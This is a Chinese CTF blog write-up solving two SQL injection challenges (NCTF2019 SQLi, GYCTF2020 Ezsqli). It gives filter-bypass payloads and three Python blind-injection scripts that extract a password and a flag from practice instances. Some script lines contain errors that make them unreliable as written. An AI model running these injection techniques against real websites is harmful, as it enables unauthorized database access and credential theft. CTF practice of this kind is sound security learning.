<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yiweibu.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="说好的一题呢？">
<meta property="og:type" content="article">
<meta property="og:title" content="每周一题(四)">
<meta property="og:url" content="http://yiweibu.github.io/2024/06/02/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/index.html">
<meta property="og:site_name" content="Wei&#39;s blog">
<meta property="og:description" content="说好的一题呢？">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602180918630.png">
<meta property="og:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602181501943.png">
<meta property="og:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602193345619.png">
<meta property="og:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602220219633.png">
<meta property="og:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602221008736.png">
<meta property="og:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602221144847.png">
<meta property="og:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602222543720.png">
<meta property="og:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602224755521.png">
<meta property="og:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602224850990.png">
<meta property="article:published_time" content="2024-06-01T16:00:00.000Z">
<meta property="article:modified_time" content="2024-06-24T16:25:58.301Z">
<meta property="article:author" content="Wei">
<meta property="article:tag" content="ctf 每周一题">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yiweibu.github.io/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602180918630.png">

<link rel="canonical" href="http://yiweibu.github.io/2024/06/02/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>每周一题(四) | Wei's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Wei's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yiweibu.github.io/2024/06/02/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Wei">
      <meta itemprop="description" content="麻雀虽小，五脏俱全；菜鸟虽菜，越学越菜">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Wei's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          每周一题(四)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-06-02 00:00:00" itemprop="dateCreated datePublished" datetime="2024-06-02T00:00:00+08:00">2024-06-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-06-25 00:25:58" itemprop="dateModified" datetime="2024-06-25T00:25:58+08:00">2024-06-25</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>说好的一题呢？</p>
<span id="more"></span>

<h2 id="NCTF2019-SQLi-GYCTF2020-Ezsqli"><a href="#NCTF2019-SQLi-GYCTF2020-Ezsqli" class="headerlink" title="[NCTF2019]SQLi&amp;&amp;[GYCTF2020]Ezsqli"></a>[NCTF2019]SQLi&amp;&amp;[GYCTF2020]Ezsqli</h2><h3 id="NCTF2019-SQLi"><a href="#NCTF2019-SQLi" class="headerlink" title="[NCTF2019]SQLi"></a>[NCTF2019]SQLi</h3><h4 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h4><p><img src="/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602180918630.png" alt="image-20240602180918630"></p>
<p>扫一下后台文件发现robots.txt，发现hint.txt</p>
<p><img src="/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602181501943.png" alt="image-20240602181501943"></p>
<p>可以看到过滤了一堆关键字，用一般的方法注入肯定不行，但是好的地方是题目里已经把sql语句写了出来，我们可以根据黑名单和sql语句进行分析</p>
<h4 id="解题过程"><a href="#解题过程" class="headerlink" title="解题过程"></a>解题过程</h4><p>我们先来想一下怎么写一个poc，一般做法是用单引号闭合然后用注释符注释后面的部分，但是这里将单引号过滤了，考虑到有两个字段，可以用’\‘实现单引号逃逸，但是注释符好像都被过滤了，但是我灵光一现，突然就想到了%00截断（好吧，其实写的时候想不到怎么做直接看wp了呜呜</p>
<p>尝试用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=\&amp;passwd=||1;%00</span><br></pre></td></tr></table></figure>

<p>发现响应里有welcome.php</p>
<p><img src="/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602193345619.png" alt="image-20240602193345619"></p>
<p>这个应该是正常的响应了，但是我们如何拿到flag呢？</p>
<p>注意hint.txt里的一句话，If $_POST[‘passwd’] &#x3D;&#x3D;&#x3D; admin’s password即可得到flag，因此我们只需获得passwd字段的值就行，但是看这一大堆过滤，联合查询和报错查询应该都用不了了，那应该怎么做呢？</p>
<p><strong>regexp正则注入</strong></p>
<p>其实我们可以想到还可以用like类似模糊匹配来获取字段值，就可以想到regexp，它刚好也没有被黑名单过滤，但是这个模式串应该怎么写？因为passwd的每一个字符我们都不知道，但是我们知道了正常响应会给一个welcome.php，由此我们可以想到用盲注来获取信息，我们可以从第一个字符开始一步步猜测，比如’passwd regexp ^a’，不行就用’b’，直到有welcome.php出现在响应报文中，这个注入过程可以写一个脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> urllib <span class="keyword">import</span> parse</span><br><span class="line">url = <span class="string">&#x27;http://0ee3cb75-d509-4e13-89ae-63671edde26a.node5.buuoj.cn:81/index.php&#x27;</span></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="comment">#可能出现的字符，看到wp里这种简洁的写法就直接拿来用了</span></span><br><span class="line">string = string.ascii_lowercase + string.digits + <span class="string">&#x27;_&#x27;</span>  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">50</span>):    <span class="comment">#猜测passwd值的长度，应该不至于超过50吧</span></span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> string:</span><br><span class="line">		data = &#123;<span class="string">&#x27;username&#x27;</span>:<span class="string">&#x27;\\&#x27;</span></span><br><span class="line">				<span class="string">&#x27;passwd&#x27;</span>:<span class="string">&#x27;||passwd/**/regexp/**/&quot;^&#123;&#125;&quot;；&#123;&#125;&#x27;</span>.<span class="built_in">format</span>(flag + j,parse.unquote(<span class="string">&#x27;%00&#x27;</span>))<span class="comment">#parse.unquote(&#x27;%00&#x27;)防止%00被转义</span></span><br><span class="line">		&#125; <span class="comment">#传&#x27;\&#x27;脚本里要写&#x27;\\&#x27;，否则把后面单引号转义了</span></span><br><span class="line">		r = request.post(url=url,data=data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;welcome&#x27;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            flag += j</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="comment">#注意如确定第一个字符为y时，只有正则式^yo会匹配到    </span></span><br><span class="line">        <span class="keyword">if</span> j == <span class="string">&#x27;_&#x27;</span> <span class="keyword">and</span> <span class="string">&#x27;welcome&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>最后得到密码</p>
<p><img src="/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602220219633.png" alt="image-20240602220219633"></p>
<p>最后拿到flag</p>
<p><img src="/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602221008736.png" alt="image-20240602221008736"></p>
<h3 id="GYCTF2020-Ezsqli"><a href="#GYCTF2020-Ezsqli" class="headerlink" title="[GYCTF2020]Ezsqli"></a>[GYCTF2020]Ezsqli</h3><h4 id="题目-1"><a href="#题目-1" class="headerlink" title="题目"></a>题目</h4><p><img src="/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602221144847.png" alt="image-20240602221144847"></p>
<p>用2-1,2试出来是数字型注入，但是union被过滤，并且报错只返回bool(false)，考虑盲注</p>
<p>发现’|’，’^’未被过滤，可以用如’1^(ascii(substr((select(database())),1,1))&gt;1)^1’判断数据库名的第一个字符，以此类推。同样可以写个脚本(这里用以前的脚本稍微改了一下)</p>
<p>爆表名，注意information_schema被过滤可用sys.schema_table_statistics_with_buffer替代</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="comment">#sess = requests.session() r = sess.get()</span></span><br><span class="line"><span class="comment">#sess.mount(&#x27;http://&#x27;, HTTPAdapter(max_retries=3))</span></span><br><span class="line"><span class="comment">#sess.mount(&#x27;https://&#x27;, HTTPAdapter(max_retries=3))</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exp</span>(<span class="params">url_format,length=<span class="literal">None</span></span>):</span><br><span class="line">    rlt = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    url  = url_format</span><br><span class="line">    <span class="keyword">if</span> length==<span class="literal">None</span>:</span><br><span class="line">        length = <span class="number">1000</span></span><br><span class="line">    <span class="keyword">for</span> l <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,length+<span class="number">1</span>):</span><br><span class="line">        time.sleep(<span class="number">0.06</span>)</span><br><span class="line">    <span class="comment">#从可打印字符开始</span></span><br><span class="line">        begin = <span class="number">32</span></span><br><span class="line">        ends = <span class="number">128</span></span><br><span class="line">        tmp = (begin+ends)//<span class="number">2</span></span><br><span class="line">        <span class="keyword">while</span> begin&lt;ends:</span><br><span class="line">            <span class="comment">#print(url.format(l,tmp))</span></span><br><span class="line">            <span class="comment">#r = requests.get(url.format(l,tmp))</span></span><br><span class="line">            <span class="comment">#sys.schema_table_statistics_with_buffer</span></span><br><span class="line">            postdata=&#123;</span><br><span class="line">                <span class="string">&#x27;id&#x27;</span>:<span class="string">&#x27;1^(ascii(substr((select(group_concat(table_name))from(sys.schema_table_statistics_with_buffer)where(table_schema=database())),&#123;&#125;,1))&gt;&#123;&#125;)^1&#x27;</span>.<span class="built_in">format</span>(l,tmp)</span><br><span class="line">            &#125;</span><br><span class="line">            r = requests.post(url=url,data=postdata)</span><br><span class="line"></span><br><span class="line">            time.sleep(<span class="number">0.04</span>)</span><br><span class="line">            <span class="comment">#根据题目定</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;Nu1L&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">                begin = tmp+<span class="number">1</span></span><br><span class="line">                tmp = (begin+ends)//<span class="number">2</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                ends = tmp</span><br><span class="line">                tmp = (begin+ends)//<span class="number">2</span></span><br><span class="line">        <span class="comment">#酌情删除，毕竟一般库表列里都没有空格</span></span><br><span class="line">        <span class="keyword">if</span> tmp == <span class="number">32</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        rlt+=<span class="built_in">chr</span>(tmp)</span><br><span class="line">        <span class="built_in">print</span>(rlt)</span><br><span class="line">    <span class="comment">#return rlt.rstrip()</span></span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://0c6136cd-28f3-4e59-88b0-23866525afa8.node5.buuoj.cn:81/&#x27;</span></span><br><span class="line">exp(url)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602222543720.png" alt="image-20240602222543720"></p>
<p>可是列名应该怎么办呢？同样我们可以用盲注的方法如select “{chr}” &gt; select * from f1ag_1s_h3r3_hhhh，如果f1ag_1s_h3r3_hhhh只有一列，当chr的ascii码值大于列名第一个字符ascii码值时，返回1，否则返回0</p>
<p><strong>ps：f1ag_1s_h3r3_hhhh实际有两列，可以用select 1，2，select 1,2,3尝试，这里还需注意f1ag_1s_h3r3_hhhh必须只有一行记录</strong></p>
<p><strong>例如存在记录：id&#x3D;1,flag&#x3D;c</strong></p>
<p><strong>则select 1,d &gt; select 1,c</strong></p>
<p><strong>返回1，其实就是”1d”&gt;”1c”</strong></p>
<p>接着再写个脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;http://0c6136cd-28f3-4e59-88b0-23866525afa8.node5.buuoj.cn:81/&#x27;</span></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">70</span>):</span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>, <span class="number">127</span>):</span><br><span class="line">        hexchar = flag + <span class="built_in">chr</span>(char)</span><br><span class="line">        <span class="comment">#刚开始一直比列名中字符的ascii值小，回显是V&amp;N，直到有个字符ascii码值大于它返回1，此时回显内容为Nu1L</span></span><br><span class="line">        payload = <span class="string">&#x27;2||((select 1,&quot;&#123;&#125;&quot;)&gt;(select * from f1ag_1s_h3r3_hhhhh))&#x27;</span>.<span class="built_in">format</span>(hexchar)</span><br><span class="line">        <span class="comment">#print(payload)</span></span><br><span class="line">        data = &#123;<span class="string">&#x27;id&#x27;</span>:payload&#125;</span><br><span class="line">        r = requests.post(url=url, data=data)</span><br><span class="line">        text = r.text</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;Nu1L&#x27;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            flag += <span class="built_in">chr</span>(char-<span class="number">1</span>)</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>最后得到flag，将字符转小写即可</p>
<p><img src="/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602224755521.png" alt="image-20240602224755521"></p>
<p><img src="/imgs/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E5%9B%9B)/image-20240602224850990.png" alt="image-20240602224850990"></p>
<h4 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h4><p>sql注入还是有挺多需要注意的点的，刚好想到最近在写数据库课设，事真多啊啊啊</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/ctf-%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98/" rel="tag"># ctf 每周一题</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/05/28/buu(%E4%BA%8C)/" rel="prev" title="buuctf一些刷过的题(二)">
      <i class="fa fa-chevron-left"></i> buuctf一些刷过的题(二)
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/06/07/%E6%AF%8F%E5%91%A8%E4%B8%80%E9%A2%98(%E4%BA%94)/" rel="next" title="每周一题(五)">
      每周一题(五) <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#NCTF2019-SQLi-GYCTF2020-Ezsqli"><span class="nav-number">1.</span> <span class="nav-text">[NCTF2019]SQLi&amp;&amp;[GYCTF2020]Ezsqli</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#NCTF2019-SQLi"><span class="nav-number">1.1.</span> <span class="nav-text">[NCTF2019]SQLi</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE"><span class="nav-number">1.1.1.</span> <span class="nav-text">题目</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B"><span class="nav-number">1.1.2.</span> <span class="nav-text">解题过程</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#GYCTF2020-Ezsqli"><span class="nav-number">1.2.</span> <span class="nav-text">[GYCTF2020]Ezsqli</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE-1"><span class="nav-number">1.2.1.</span> <span class="nav-text">题目</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-number">1.2.2.</span> <span class="nav-text">小结</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Wei</p>
  <div class="site-description" itemprop="description">麻雀虽小，五脏俱全；菜鸟虽菜，越学越菜</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Wei</span>
</div>
<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>
-->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
